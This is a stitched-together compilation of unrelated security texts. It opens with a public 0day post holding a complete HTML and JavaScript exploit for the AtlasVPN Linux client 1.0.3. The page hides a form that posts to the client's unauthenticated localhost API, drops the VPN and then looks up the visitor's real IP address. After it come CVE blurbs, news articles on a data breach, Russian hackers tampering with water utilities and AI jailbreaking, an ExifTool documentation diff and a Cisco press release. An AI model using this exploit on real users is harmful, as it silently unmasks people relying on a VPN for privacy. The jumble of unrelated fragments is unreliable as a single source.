Remote disconnect exploit for AtlasVPN Linux client version 1.0.3 that will allow a remote website to extract a client's real IP address.

    The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users safety serious, because their software security decisions suck so massively that its hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.Root CauseThe AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client (atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another request, this leaks the users home IP address to ANY website using the exploit code.Exploit CodeThe following code demonstrates the issue. It can be uploaded to any webserver. When the site is visited, AtlasVPN disconnects and leaks the IP address. Not intended for illegal purposes.    <html>     <head>      <title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>    </head>     <body>      <pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=     You should be running the atlasvpn linux client and be connected to a VPN.    Use <b>atlasvpn connect</b> to connect to a VPN server.     </code></pre>       <iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>      <form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">        <button type="submit" style="display: none"></button>      </form>       <script>        window._currentIP = false;         // Run main exploit code        window.addEventListener('load', function () {          addIPToLog();          setTimeout(triggerFormSubmission, 1000);          setTimeout(addIPToLog, 3000);        });         // Blind CORS request to atlasvpnd to disconnect the VPN        function triggerFormSubmission() {          var logDiv = document.getElementById('log');          logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";          document.getElementById('stopForm').submit();        }         // Gets IP from ipfy API (this, of course, could be your server)        function addIPToLog() {          var logDiv = document.getElementById('log');          var xhr = new XMLHttpRequest();           xhr.open('GET', 'https://api.ipify.org?format=json', true);           xhr.onload = function () {            var ipAddress = window._currentIP;            if (xhr.status === 200) {              var response = JSON.parse(xhr.responseText);              ipAddress = response.ip;               logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";            } else {              logDiv.innerHTML += '[-] Error fetching IP address.\n';            }             // Check if the IP changed. If yes: Success.            if (window._currentIP && window._currentIP != ipAddress) {              logDiv.innerHTML += "[+] Successfully disconnected VPN."            }            if (window._currentIP && window._currentIP == ipAddress) {              logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."            }             // Save IP for next iteration.            window._currentIP = ipAddress;          };           xhr.send();        }      </script>    </body>    </html>    GreetsFly out to a certain crafter of trashy maps and my favourite WoW NPC. I hope this makes it into the press. Peace out.

AtlasVPN Linux Client 1.0.3 IP Leak

A WIRED investigation, based on more than 22 million flight coordinates, reveals the complicated truth about the first full-blown police drone program in the US—and why your city could be next.

The Age of the Drone Police Is Here

The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.

Something went wrong, but don’t fret — let’s give it another shot.

CVE-2019-6447

By Deeba Ahmed
A massive data leak of 820,000 Dominicans' personal information (including COVID vaccination status) has been leaked online puting individuals at risk of identity theft, scams, and social engineering attacks.
This is a post from HackRead.com Read the original post: Hackers Leak COVID-19 Data of 820K Dominicans, Including Vaccination Info

A data breach has occurred, exposing the personally identifiable information (PII) of 820,000 individuals from the Dominican Republic with their COVID-19 vaccination statuses. This data has been leaked on Breach Forums, a notorious cybercrime and hacker forum.

This leak is critical for the sensitive nature of data exposed, including records from biotech giants Pfizer and SINOVAC BIOTECH LTD, creating a goldmine for cybercriminals and nation-state actors. 

****Source of the Leak****

According to Resecurity’s Cyber Threat Intelligence team, the data has been uploaded on the Breach Forums by ‘CiberInteligenciaSV,’ a strategy consistent with many high-profile Latin American (LATAM) data breaches. 

The possible actor behind the breach was tracked after a Breach Forums member “CTF” noted overlaps with caribetours.com.do leaked database.  Caribe Tours, a Dominican tourism company, was hacked by Kelvin Security in April 2022. The group, involved in over 300 cyberattacks since 2020, has targeted strategic industries in over 90 countries. Spanish authorities arrested its alleged leader in December 2023.

While CyberInteligenciaSV’s source for Dominican data is unclear, CTF has raised concerns about the accuracy of some of the leaked data, as users cross-referenced ID card numbers with official Dominican government portals and saw different names associated with them.

****Why is this Leak a Big Deal?****

The data dump contains key PII fields such as ID card number, name, gender, municipality, birth date, and vaccination data. The leak exposes the total doses, clinic location, vaccination date, and vaccine type administered to the patient.

Stolen personal information can be used for identity theft, targeted scams, and social engineering. Scammers can create fake IDs, open fraudulent bank accounts, or make unauthorized purchases. They can also launch convincing phishing attacks, claiming rewards for vaccination or manipulating public opinion, targeting unvaccinated individuals with misinformation

“Alternately, threat actors could also look to sell this data to third parties seeking health-related personal information, including advertisers and employers,” Resecurity researchers explained.

The LATAM region is urged to improve digital hygiene and take precautions against cyber risks. The Dominican government must investigate this data breach, notify affected individuals, and strengthen data security to prevent future attacks. This includes identifying the source, providing clear guidance on self-protection, and investing in robust encryption, access controls, and security awareness training for government employees.

1.  India’s COVID-19 surveillance tool exposed millions of user data
2.  Covid antigen test results of 1.7m Indian, foreign nationals leaked
3.  COVID-19 testing service in US exposes patients’ photos, passports
4.  Indonesian Govt’s COVID-19 test, trace app leak impacts 1.3m users
5.  Chinese COVID-19 detection firm hacked; source code sold on dark web

Hackers Leak COVID-19 Data of 820K Dominicans, Including Vaccination Info

Cyber Army of Russia Reborn, a group with ties to the Kremlin’s Sandworm unit, is crossing lines even that notorious cyberwarfare unit wouldn’t dare to.

Russia's military intelligence unit known as Sandworm has, for the past decade, served as the Kremlin’s most aggressive cyberattack force, triggering blackouts in Ukraine and releasing self-spreading, destructive code in incidents that remain some of the most disruptive hacking events in history. In recent months, however, one group of hackers linked to Sandworm has attempted a kind of digital mayhem that, in some respects, goes beyond even its predecessor: They've claimed responsibility for directly targeting the digital systems of a hydroelectric dam in France and water utilities in the United States and Poland, flipping switches and changing software settings in an apparent effort to sabotage those countries’ critical infrastructure.

Since the beginning of this year, a hacktivist group known as the Cyber Army of Russia, or sometimes Cyber Army of Russia Reborn, has taken credit on at least three occasions for hacking operations that targeted US and European water and hydroelectric utilities. In each case, the hackers have posted videos to the social media platform Telegram that show screen recordings of their chaotic manipulation of so-called human-machine interfaces, software that controls physical equipment inside those target networks. The apparent victims of that hacking include multiple US water utilities in Texas, one Polish wastewater treatment plant, and a French hydroelectric plant—though it’s not clear exactly how much disruption or damage the hackers may have managed against any of those facilities.

A new report published today by cybersecurity firm Mandiant draws a link between that hacker group and Sandworm, which has been identified for years as Unit 74455 of Russia’s GRU military intelligence agency. Mandiant found evidence that Sandworm helped create Cyber Army of Russia Reborn and tracked multiple instances when data stolen from networks that Sandworm had attacked was later leaked by the Cyber Army of Russia Reborn group. Mandiant couldn't determine, however, whether Cyber Army of Russia Reborn is merely one of the many cover personas that Sandworm has adopted to disguise its activities over the last decade or instead a distinct group that Sandworm helped to create and collaborated with but which is now operating independently.

Either way, Cyber Army of Russia Reborn’s hacking has now, in some respects, become even more brazen than Sandworm itself, says John Hultquist, who leads Mandiant’s threat-intelligence efforts and has tracked Sandworm’s hackers for nearly a decade. He points out that Sandworm has never directly targeted a US network with a disruptive cyberattack—only planted malware on US networks in preparation for one or, in the case of its 2017 NotPetya ransomware attack, infected US victims indirectly with self-spreading code. Cyber Army of Russia Reborn, by contrast, hasn’t hesitated to cross that line.

“Even though this group is operating under this persona that’s tied to Sandworm, they do seem more reckless than any Russian operator we’ve ever seen targeting the United States,” Hultquist says. “They’re actively manipulating operational technology systems in a way that’s highly aggressive, probably disruptive, and dangerous.”

**An Overflowed Tank and a French Rooster**

Mandiant didn't have access to the targeted water utility and hydroelectric plant networks, so wasn't able to determine how Cyber Army of Russian Reborn got access to those networks. One of the group’s videos posted in mid-January, however, shows what appears to be a screen recording that captures the hackers’ manipulation of software interfaces for the control systems of water utilities in the Texas towns of Abernathy and Muleshoe. “We are starting our next raid across the USA,” reads a message introducing the video on Telegram. “In this video there are a couple of critical infrastructure objects, namely water supply systems😋”

A screen recording shows Cyber Army of Russian Reborn clicking buttons on the interface of a water utility in Texas.

Cyber Army of Russia Reborn via Telegram

The video then shows the hackers frenetically clicking around the target interface, changing values and settings for both utilities’ control systems. Though it’s not clear what effects that manipulation may have had, the Texas newspaper _The Plainview Herald_ reported in early February that local officials had acknowledged the cyberattacks and confirmed some level of disruption. The city manager for Muleshoe, Ramon Sanchez, reportedly said in a public meeting that the attack on the town’s utility had resulted in one water tank overflowing. Officials for the nearby towns of Abernathy and Hale Center—a target not mentioned in the hackers’ video—also said they’d been hit. All three towns’ utilities, as well as another, in Lockney, reportedly disabled their software to prevent its exploitation, but officials said that service to the water utilities’ customers was never interrupted. (WIRED reached out to officials from Muleshoe and Abernathy but didn't immediately hear back.)

Another screen recording shows Cyber Army of Russian Reborn tampering with the control systems of a Polish wastewater treatment plant, seemingly changing settings at radom.

Cyber Army of Russia Reborn via Telegram

Another video the Cyber Army of Russia Reborn hackers posted in January shows what appears to be a screen recording of a similar attempted sabotage of a wastewater utility in Wydminy, a village in Poland, a country whose government has been a staunch supporter of Ukraine in the midst of Russia’s invasion. “Hi everybody, today we will play with the Polish wastewater treatment plants. Enjoy watching!” says an automated Russian voice at the beginning of the video. The video then shows the hackers flipping switches and changing values in the software, set to a Super Mario Bros. soundtrack.

A third screen recording shows Cyber Army of Russia Reborn's access to a French water utility.

Cyber Army of Russia Reborn via Telegram

In a third video, published in March, the hackers similarly record themselves tampering with the control system for what they describe as the Courlon Sur Yonne hydroelectric dam in France. That video was posted just after French president Emmanuel Macron had made public statements suggesting he would send French military personnel to Ukraine to aid in its war against Russia. The video starts by showing Macron in the form of a rooster holding a French flag. “We recently heard a French rooster crowing,” the video says. “Today we’ll take a look at the Courlon dam and have a little fun. Enjoy watching, friends. Glory to Russia!”

In their Telegram post, the hackers claim to have lowered the French dam’s water level and stopped the flow of electricity it produced, though WIRED couldn’t confirm those claims. Neither the Wydminy facility nor the owner of the Courlon dam, Energies France, responded to WIRED’s request for comment.

In the videos, the hackers do display some knowledge of how a water utility works, as well as some ignorance and random switch-flipping, says Gus Serino, the founder of cybersecurity firm I&C Secure and a former staffer at a water utility and at the infrastructure cybersecurity firm Dragos. Serino notes that the hackers did, for instance, change the “stop level” for water tanks in the Texas utilities, which could have triggered the overflow that officials mentioned. But he notes that they also made other seemingly arbitrary changes, particularly for the Wydminy wastewater plant, that would have had no effect.

Hackers Linked to Russia’s Military Claim Credit for Sabotaging US Water Utilities

Plus: Hackers claim to have stolen 10 TB from Western Digital, a new spyware has emerged, and WhatsApp gets a fresh security feature.

If you had “leaking classified US military documents for the lulz” on your 2023 Bingo card, congratulations. The fast-paced drama surrounding the online disclosure of top-secret material ripped through this week’s news. We’ll dive into the details below, but there’s one key takeaway: This bizarre kind of leak may be only the beginning.

Anyone worried about chaos agents of a different variety now have a new way to protect their online identities. LinkedIn this week began to roll out new tools that allow you to verify your identity and your job. And for iOS users who want a built-in way to protect their security, we detailed how to use Apple’s all-in-one password manager.

While your personal security might be moving in the right direction, ChatGPT and other large language models (LLMs) aren’t so lucky. This week we explored the world of “jailbreaking” generative AI tools, which allows users to trick the powerful chatbots into doing things that their creators have tried to stop. It’s still early days in the world of LLM hacking, but it’s a safe bet that we’ll be hearing a lot more about this in the months to come. 

Finally, yesterday afternoon, Montana lawmakers voted to ban downloads of TikTok in the state. Governor Greg Gianforte is expected to sign the unprecedented legislation into law, despite the likelihood of swift legal and technical challenges.

But that’s not all. Each week, we round up the stories we didn’t report in-depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

Yesterday, Jack Teixeira, an airman with the Massachusetts Air National Guard, was formally charged with retaining and transmitting national defense information and intentionally withholding classified documents. _The New York Times_ was the first to identify Teixeira, and FBI agents arrested him at his family’s home soon after the publication named him as the alleged source of the leak.

The 21-year-old allegedly disclosed the top-secret intelligence in an attempt to show off to members of Thug Shaker Central, an invite-only chat room hosted on Discord. The chat consisted of two dozen adolescent boys and young men who, according to _The Washington Post_, largely did not understand the significance of the leak. 

The bizarre circumstances of the leak have, according to NBC News, frustrated and embarrassed US intelligence officials who are now looking to potentially broaden the surveillance of online chat rooms after failing to spot the classified Pentagon documents that had been circulating online for weeks. 

The documents consisted of sensitive information regarding Russian military tactics during the conflict in Ukraine as well as intelligence reports on friendly nations such as Israel and South Korea, among other topics. 

Monitoring chatter in public chat rooms is commonplace for law enforcement. But if US intelligence agencies plan on surveilling private conversations without probable cause, they will run into serious legal and civil liberties hurdles, experts say. “We do not have nor do we want a system where the United States government monitors private internet chats,” Glenn Gerstell, a former general counsel of the National Security Agency, told NBC News. 

US defense secretary Lloyd Austin on Thursday said he was considering “additional measures necessary to safeguard our nation’s secrets,” and he ordered a review of “our intelligence access, accountability, and control procedures within the department to inform our efforts to prevent this kind of incident from happening again.”

Hackers who claim to have breached data storage company Western Digital earlier this month say they are holding 10 terabytes of stolen data hostage and are ready to publish it unless the company pays a “minimum 8 figure” ransom, TechCrunch reports. 

An individual who says they carried out the hack spoke to TechCrunch on Thursday, claiming to have reams of customer information. While the hacker showed TechCrunch screenshots of internal emails and contact information of Western Digital’s employees, it’s still unclear exactly what data has been stolen.

“Cut the crap, get the money, and let’s both go our separate ways,” the hackers wrote in an email to several company executives. “Simply put, let us put our egos aside and work to find a resolution to this chaotic scenario.” 

A secretive Israeli spyware company’s hacking tools have been used to target politicians and journalists in at least 10 countries, according to research by Microsoft and the University of Toronto’s Citizen Lab made public Tuesday. 

The company, QuaDream, is a small, low-profile Israeli firm that develops smartphone hacking tools intended for government clients. The firm was established in 2016 by former employees of NSO Group, the maker of the Pegasus spyware.

The QuaDream spyware targeted older versions of Apple’s iOS phone software, and it worked by sending malicious calendar invites that would not be seen by the targets, researchers say.

According to the report, Citizen Lab has located QuaDream servers in Bulgaria, the Czech Republic, Hungary, Ghana, Israel, Mexico, Romania, Singapore, the United Arab Emirates, and Uzbekistan. 

WhatsApp has introduced a new security feature that makes it harder for scammers to steal users' accounts. The feature will require individuals who download WhatsApp to a new device to use their old device to confirm their account. It's an extra layer of security that aims to protect users from account takeovers through SIM jacking or other social engineering attacks.

A WhatsApp spokesperson told Engadget that the Account Protect feature will activate only when the company suspects a malicious account takeover. If a user lost their old device, they can also request a one-time passcode from WhatsApp.

Security Roundup: Leak of Top-Secret US Intel Risks a New Wave of Mass Surveillance

lib/Image/ExifTool.pm in ExifTool before 12.38 mishandles a $file =~ /\|$/ check, leading to command injection.

@@ -431,9 +431,10 @@ <h2 class=top>Nikon Tags</h2> <br\>ShotInfoD6 <br\>ShotInfoD610 <br\>ShotInfoZ7\_2 <br\>ShotInfoZ9 <br\>ShotInfo02xx <br\>ShotInfoUnknown</td\> <td class\=c\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-</td\> <td class\=c\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-<br\>\-</td\> <td\>\--&gt; <a href\='Nikon.html#ShotInfoD40'\>Nikon ShotInfoD40 Tags</a\> <br\>\--&gt; <a href\='Nikon.html#ShotInfoD80'\>Nikon ShotInfoD80 Tags</a\> <br\>\--&gt; <a href\='Nikon.html#ShotInfoD90'\>Nikon ShotInfoD90 Tags</a\> @@ -459,6 +460,7 @@ <h2 class=top>Nikon Tags</h2> <br\>\--&gt; <a href\='Nikon.html#ShotInfoD6'\>Nikon ShotInfoD6 Tags</a\> <br\>\--&gt; <a href\='Nikon.html#ShotInfoD610'\>Nikon ShotInfoD610 Tags</a\> <br\>\--&gt; <a href\='Nikon.html#ShotInfoZ7\_2'\>Nikon ShotInfoZ7\_2 Tags</a\> <br\>\--&gt; <a href\='Nikon.html#ShotInfoZ9'\>Nikon ShotInfoZ9 Tags</a\> <br\>\--&gt; <a href\='Nikon.html#ShotInfo'\>Nikon ShotInfo Tags</a\> <br\>\--&gt; <a href\='Nikon.html#ShotInfo'\>Nikon ShotInfo Tags</a\></td\></tr\> <tr\> @@ -470,18 +472,7 @@ <h2 class=top>Nikon Tags</h2> <td title\='0x0093 = 147'\>0x0093</td\> <td\>NEFCompression</td\> <td class\=c\>int16u</td\> <td\><table class\=cols\><tr\> <td\>1 = Lossy (type 1) <br\>2 = Uncompressed <br\>3 = Lossless <br\>4 = Lossy (type 2) <br\>5 = Striped packed 12 bits <br\>6 = Uncompressed (reduced to 12 bit) <br\>7 = Unpacked 12 bits <br\>8 = Small <br\>9 = Packed 12 bits <br\>10 = Packed 14 bits</td\></tr\></table\> </td\></tr\> <td\>\--&gt; <a href\='Nikon.html#NEFCompression'\>Nikon NEFCompression Values</a\></td\></tr\> <tr\> <td title\='0x0094 = 148'\>0x0094</td\> <td\>SaturationAdj</td\> @@ -815,6 +806,25 @@ <h2 class=top>Nikon Tags</h2> <br\>&#39;16 16 16 0&#39; = 16 x 3</span\></td\></tr\> </table\></td\></tr\></table\></blockquote\>  
<h2\><a name\='NEFCompression'\>Nikon NEFCompression Values</a\></h2\> <blockquote\> <table class\=frame\><tr\><td\> <table class\='inner sep' cellspacing\=1\> <tr class\=h\><th\>Value</th\><th\>NEFCompression</th\><th\>Value</th\><th\>NEFCompression</th\></tr\> <tr\><td class\=r\>1</td\><td\>\= Lossy (type 1)</td\> <td class\='r b'\>7</td\><td class\=b\>\= Unpacked 12 bits</td\> </tr\><tr\><td class\=r\>2</td\><td\>\= Uncompressed</td\> <td class\='r b'\>8</td\><td class\=b\>\= Small</td\> </tr\><tr\><td class\=r\>3</td\><td\>\= Lossless</td\> <td class\='r b'\>9</td\><td class\=b\>\= Packed 12 bits</td\> </tr\><tr\><td class\=r\>4</td\><td\>\= Lossy (type 2)</td\> <td class\='r b'\>10</td\><td class\=b\>\= Packed 14 bits</td\> </tr\><tr\><td class\=r\>5</td\><td\>\= Striped packed 12 bits</td\> <td class\='r b'\>13</td\><td class\=b\>\= High Efficiency</td\> </tr\><tr\><td class\=r\>6</td\><td\>\= Uncompressed (reduced to 12 bit)</td\> <td class\='r b'\>14</td\><td class\=b\>\= High Efficiency\*</td\> </tr\></table\></td\></tr\></table\></blockquote\>  
<h2\><a name\='PreviewIFD'\>Nikon PreviewIFD Tags</a\></h2\> <blockquote\> <table class\=frame\><tr\><td\> @@ -1703,6 +1713,24 @@ <h2><a name='LocationInfo'>Nikon LocationInfo Tags</a></h2> <td\>&nbsp;</td\></tr\> </table\></td\></tr\></table\></blockquote\>  
<h2\><a name\='MakerNotes0x51'\>Nikon MakerNotes0x51 Tags</a\></h2\> <blockquote\> <table class\=frame\><tr\><td\> <table class\=inner cellspacing\=1\> <tr class\=h\><th\>Index1</th\><th\>Tag Name</th\> <th\>Writable</th\><th\>Values / <span class\=n\>Notes</span\></th\></tr\> <tr\> <td class\=r title\='0 = 0x0'\>0</td\> <td\>FirmwareVersion</td\> <td class\=c\>no</td\> <td\>&nbsp;</td\></tr\> <tr class\=b\> <td class\=r title\='10 = 0xa'\>10</td\> <td\>NEFCompression</td\> <td class\=c\>int16u\[0.5\]</td\> <td\>\--&gt; <a href\='Nikon.html#NEFCompression'\>Nikon NEFCompression Values</a\></td\></tr\> </table\></td\></tr\></table\></blockquote\>  
<h2\><a name\='AFInfo'\>Nikon AFInfo Tags</a\></h2\> <blockquote\> <table class\=frame\><tr\><td\> @@ -3996,44 +4024,78 @@ <h2><a name='ZMenuSettings'>Nikon ZMenuSettings Tags</a></h2> <td\><span class\=s\>0 = No <br\>1 = Yes</span\></td\></tr\> <tr class\=b\> <td class\=r title\='577 = 0x241'\>577</td\> <td\>MovieDiffractionCompensation?</td\> <td class\=c\>int8u</td\> <td\><span class\=s\>0 = Off <br\>1 = On</span\></td\></tr\> <tr\> <td class\=r title\='578 = 0x242'\>578</td\> <td\>MovieAutoDistortionControl?</td\> <td class\=c\>int8u</td\> <td\><span class\=s\>0 = Off <br\>1 = On</span\></td\></tr\> <tr\> <tr class\=b\> <td class\=r title\='584 = 0x248'\>584</td\> <td\>MovieFocusMode?</td\> <td class\=c\>int8u</td\> <td\><span class\=s\>0 = Manual <br\>1 = AF-S <br\>2 = AF-C <br\>4 = AF-F</span\></td\></tr\> <tr class\=b\> <tr\> <td class\=r title\='590 = 0x24e'\>590</td\> <td\>MovieVibrationReduction?</td\> <td class\=c\>int8u</td\> <td\><span class\=s\>0 = Off <br\>1 = On (Normal) <br\>2 = On (Sport)</span\></td\></tr\> <tr\> <tr class\=b\> <td class\=r title\='591 = 0x24f'\>591</td\> <td\>MovieVibrationReductionSameAsPhoto?</td\> <td class\=c\>int8u</td\> <td\><span class\=s\>0 = No <br\>1 = Yes</span\></td\></tr\> <tr class\=b\> <tr\> <td class\=r title\='858 = 0x35a'\>858</td\> <td\>HDMIOutputN-Log?</td\> <td class\=c\>int8u</td\> <td\><span class\=s\>0 = Off <br\>1 = On</span\></td\></tr\> </table\></td\></tr\></table\></blockquote\>  
<h2\><a name\='ShotInfoZ9'\>Nikon ShotInfoZ9 Tags</a\></h2\> <p\>These tags are extracted from encrypted data in images from the Z9.</p\> <blockquote\> <table class\=frame\><tr\><td\> <table class\=inner cellspacing\=1\> <tr class\=h\><th\>Index</th\><th\>Tag Name</th\> <th\>Writable</th\><th\>Values / <span class\=n\>Notes</span\></th\></tr\> <tr\> <td class\=r title\='5771 = 0x168b'\>5771</td\> <td\>MovieDiffrationCompensation?</td\> <td class\=c\>int8u</td\> <td\><span class\=s\>0 = Off <br\>1 = On</span\></td\></tr\> <td class\=r title\='0 = 0x0'\>0</td\> <td\>ShotInfoVersion</td\> <td class\=c\>no</td\> <td\>&nbsp;</td\></tr\> <tr class\=b\> <td class\=r title\='4 = 0x4'\>4</td\> <td\>FirmwareVersion</td\> <td class\=c\>no</td\> <td\>&nbsp;</td\></tr\> <tr\> <td class\=r title\='60139 = 0xeaeb'\>60139</td\> <td\>RollAngle</td\> <td class\=c\>fixed32u</td\> <td\><span class\=s\><span class\=n\>(converted to degrees of clockwise camera roll)</span\></span\></td\></tr\> <tr class\=b\> <td class\=r title\='60143 = 0xeaef'\>60143</td\> <td\>PitchAngle</td\> <td class\=c\>fixed32u</td\> <td\><span class\=s\><span class\=n\>(converted to degrees of upward camera tilt)</span\></span\></td\></tr\> <tr\> <td class\=r title\='60147 = 0xeaf3'\>60147</td\> <td\>YawAngle</td\> <td class\=c\>fixed32u</td\> <td\><span class\=s\><span class\=n\>(the camera yaw angle when shooting in portrait orientation)</span\></span\></td\></tr\> </table\></td\></tr\></table\></blockquote\>  
<h2\><a name\='ShotInfo'\>Nikon ShotInfo Tags</a\></h2\> @@ -7949,7 +8011,7 @@ <h2><a name='LensID'>Nikon LensID Values</a></h2>  
<hr\> (This document generated automatically by Image::ExifTool::BuildTagLookup) <br\><i\>Last revised Dec 8, 2021</i\> <br\><i\>Last revised Dec 20, 2021</i\> <p class\=lf\><a href\='index.html'\>&lt;-- ExifTool Tag Names</a\></p\> </body\> </html\>

CVE-2022-23935: Update to 12.38 · exiftool/exiftool@74dbab1

**SAN FRANCISCO****,** **April 24, 2023** **/PRNewswire/ --** **RSA CONFERENCE 2023 --** Cisco (NASDAQ: CSCO), the leader in enterprise networking and security, unveiled the latest progress towards its vision of the Cisco Security Cloud, a unified, AI-driven, cross-domain security platform. Cisco's new XDR solution and the release of advanced features for Duo MFA will help organizations better protect the integrity of their entire IT ecosystem.

**Threat Detection and Response****

Cisco's XDR strategy converges its deep expertise and visibility across the network and endpoints into one turnkey, risk-based solution. Now in Beta with General Availability coming in July 2023, Cisco XDR simplifies investigating incidents and enables security operations centers (SOCs) to immediately remediate threats. The cloud-first solution applies analytics to prioritize detections and moves the focus from endless investigations to remediating the highest priority incidents with evidence-backed automation.

"The threat landscape is complex and evolving. Detection without response is insufficient, while response without detection is impossible. With Cisco XDR, security operations teams can respond and remediate threats before they have a chance to cause significant damage," said Jeetu Patel**, Executive Vice President and General Manager of Security and Collaboration at Cisco.** "Cisco continues to ensure that 'if it's connected, you're also protected.' We are uniquely positioned to deliver integrated solutions that simplify securing today's increasingly complex, hybrid multi-cloud environments without compromising user experience."

While traditional Security Information and Event Management (SIEM) technology provides management for log-centric data and measures outcomes in days, Cisco XDR focuses on telemetry-centric data and delivers outcomes in minutes. It natively analyzes and correlates the six telemetry sources that Security Operations Center (SOC) operators say are critical for an XDR solution: endpoint, network, firewall, email, identity, and DNS. On the endpoint specifically, Cisco XDR leverages insight from 200 million endpoints with Cisco Secure Client, formerly AnyConnect, to provide process-level visibility of where the endpoint meets the network.

"The true measure of XDR is its ability to deliver actual security outcomes, real and measurable benefit to organizations — early detection, impact prioritization, and effective and efficient response," said Frank Dickson**, Group Vice President, Security & Trust, IDC.** "True results need to be quantifiable numerically and not just qualitatively described with words. Cisco XDR delivers a clear framework for enabling organizations to achieve such tangible outcomes."

In addition to Cisco's native telemetry, Cisco XDR integrates with leading third-party vendors to share telemetry, increase interoperability, and deliver consistent outcomes regardless of vendor or technology. The initial set of out-of-the-box integrations at general availability include:

*   **Endpoint Detection and Response (EDR)**: CrowdStrike Falcon Insight XDR, Cybereason Endpoint Detection and Response, Microsoft Defender for Endpoint, Palo Alto Networks Cortex XDR, SentinelOne Singularity, Trend Vision One
*   **Email Threat Defense:** Microsoft Defender for Office, Proofpoint Email Protection
*   **Next-Generation Firewall (NGFW):** Check Point Quantum, Palo Alto Networks Next-Generation Firewall
*   **Network Detection and Response (NDR):** Darktrace DETECT™ and Darktrace RESPOND™,  ExtraHop Reveal(x)
*   **Security Information and Event Management (SIEM):** Microsoft Sentinel

"Throughout Logicalis' decades-long pursuit to becoming a world class integrator; we have recognized the impact extensibility can have on the viability and efficacy of any solution," said Brad Davenport**, Vice President of Technical Architecture, Logicalis**. "With the launch of Cisco XDR, we can finally provide our customers with XDR outcomes as a solution or managed offering. We see this as a natural progression for us along the security maturity journey. Logicalis is very excited to put our combined expertise to work for our clients and offer Cisco XDR to help them achieve their business outcomes."

**Zero Trust and Access Management**

As attackers increasingly target gaps in weaker multi-factor authentication (MFA) implementations, Cisco is redefining what is essential for access management. Every business needs three key pillars for its access management strategy: enforcing strong authentication, verifying devices, and reducing the number of passwords in use. This is why, beginning on May 1st, Cisco is adding Trusted Endpoints to all its paid Duo Editions. Previously just available in Duo's highest tier, Trusted Endpoints allows only registered or managed devices to access resources. By delivering Trusted Endpoints alongside Single Sign On, MFA, Passwordless, and Verified Push within the entry-level Duo Essentials edition, Cisco is delivering the most secure, cost-effective, and user-friendly access management solution on the market.

To learn more, visit Cisco.com/go/security.   

**Supporting Quotes**

"Darktrace DETECT and RESPOND, parts of the Darktrace Cyber AI Loop, can quickly contain and disarm threats, whether known or unknown, and with a high degree of fidelity. Our collaboration with Cisco will provide our mutual customers with added visibility into security incidents and actions across cloud, network and OT," said Mattheus Bovbjerg**, Vice President of Integrations, Darktrace.** We look forward to expanding this collaboration to additional coverage areas including email and SaaS applications in the future."

"As organizations embrace the network as the essential source for cybertruth, our partnership with Cisco offers enterprises the ability to integrate ExtraHop with best-of-breed products for a more comprehensive view of their IT environments," said Jesse Rothstein**, Chief Technology Officer and Co-Founder, ExtraHop**. "Joint customers will benefit from ExtraHop's enterprise-grade, high–fidelity detections with network decryption and support for more than 80+ protocols, while also seamlessly integrating with log and endpoint solutions to achieve more streamlined investigations."

"SentinelOne is excited to team with Cisco to deliver market-leading solutions that allow our joint customers to push the boundaries of security," said Akhil Kapoor**, Vice President of Technology Partnerships and Business Development, SentinelOne**. "We look forward to integrating our EDR and Cloud Workload Protection (CWPP) solutions with Cisco to help organizations of all sizes secure tomorrow today."

"Our vision for XDR is to provide customers with a comprehensive, consolidated view of their security posture, enabling them to respond to threats quickly and effectively," said Mike Gibson**, Senior Vice President of Global Services and Customer Success, Trend Micro**. "The integration with Cisco XDR is a significant step forward in the evolution of cybersecurity. By leveraging the strength of both solutions, we are able to offer our customers a unified solution that expands telemetry insights to gain a greater perspective of their security environment enabling them to detect threats faster and respond more effectively."

**Additional Resources**

*   **Blog**: XDR and the Importance of Cross-Domain Correlated Telemetry
*   **Blog**: Simplify Your Security Operations with Cisco XDR, Launching at RSAC
*   **Blog**: Raising the Bar: Duo Redefines What is Essential for Access Management 

**About Cisco** 

Cisco (NASDAQ: CSCO) is the worldwide leader in technology that powers the Internet. Cisco inspires new possibilities by reimagining your applications, securing your data, transforming your infrastructure, and empowering your teams for a global and inclusive future. Discover more on The Newsroom and follow us on Twitter at @Cisco. 

Cisco and the Cisco logo are trademarks or registered trademarks of Cisco and/or its affiliates in the U.S. and other countries. A listing of Cisco's trademarks can be found at www.cisco.com/go/trademarks. Third-party trademarks mentioned are the property of their respective owners. The use of the word partner does not imply a partnership relationship between Cisco and any other company. 

SOURCE Cisco Systems, Inc.

**

Cisco Unveils Solution to Rapidly Detect Advanced Cyber Threats and Automate Response

A government effort to collect people’s internet records is moving beyond its test phase, but many details remain hidden from public view.

The UK government is quietly expanding and developing a controversial surveillance technology that could be capable of logging and storing the web histories of millions of people.

